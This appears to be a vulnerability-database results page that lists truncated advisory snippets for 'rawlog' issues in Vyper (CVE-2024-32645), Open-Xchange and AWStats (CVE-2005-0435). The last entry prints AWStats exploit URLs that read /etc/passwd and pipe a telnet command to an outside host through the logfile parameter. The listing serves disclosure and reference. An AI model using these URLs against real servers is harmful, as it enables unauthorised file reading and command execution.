GHSA-XCHQ-W5R3-4WG3 vyper performs incorrect topic logging in raw_log

Summary Incorrect values can be logged when rawlog builtin is called with memory or storage arguments to be used as topics. A contract search was performed and no vulnerable contracts were found in production. In particular, no uses of rawlog were found at all in production; it is apparently not ...

vyper performs incorrect topic logging in raw_log

Summary Incorrect values can be logged when rawlog builtin is called with memory or storage arguments to be used as topics. A contract search was performed and no vulnerable contracts were found in production. In particular, no uses of rawlog were found at all in production; it is apparently not ...

CVE-2024-32645

Vyper is a pythonic Smart Contract Language for the Ethereum virtual machine. In versions 0.3.10 and prior, incorrect values can be logged when rawlog builtin is called with memory or storage arguments to be used as topics. A contract search was performed and no vulnerable contracts were found in...

CVE-2024-32645 vyper performs incorrect topic logging in raw_log

Vyper is a pythonic Smart Contract Language for the Ethereum virtual machine. In versions 0.3.10 and prior, incorrect values can be logged when rawlog builtin is called with memory or storage arguments to be used as topics. A contract search was performed and no vulnerable contracts were found in...

CVE-2024-32645

Vyper (Pythonic smart contract language for the EVM) is affected by CVE-2024-32645 in versions 0.3.10 and earlier. The root cause is in the RawLog.build_IR path: it fails to unwrap variables provided as topics, causing incorrect values to be logged as topics. As of publication, no fixed version i...

Open-Xchange: command Injection in rawlog binary

Quick Overview I have found a Command Injection vulnerability in the code where a method calls an OS Shell command using an untrusted string to execute. Introduction Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable...

AWStats rawlog Plugin File Information Disclosure - Ver2 (CVE-2005-0435)

An information disclosure vulnerability has been reported in Awstats. Successful exploitation of this vulnerability would allow remote attackers to gain access to sensitive information...

CVE-2005-0435

awstats.pl in AWStats 6.3 and 6.4 allows remote attackers to read server web logs by setting the loadplugin and pluginmode parameters to rawlog...

AWStats 5.0 < 6.3 - 'logfile' File Inclusion / Command Execution

Example: http://target/awstats.pl?filterrawlog=&rawlogmaxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&log file=/etc/passwd http://target/awstats.pl?filterrawlog=&rawlogmaxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet milw0rm.co...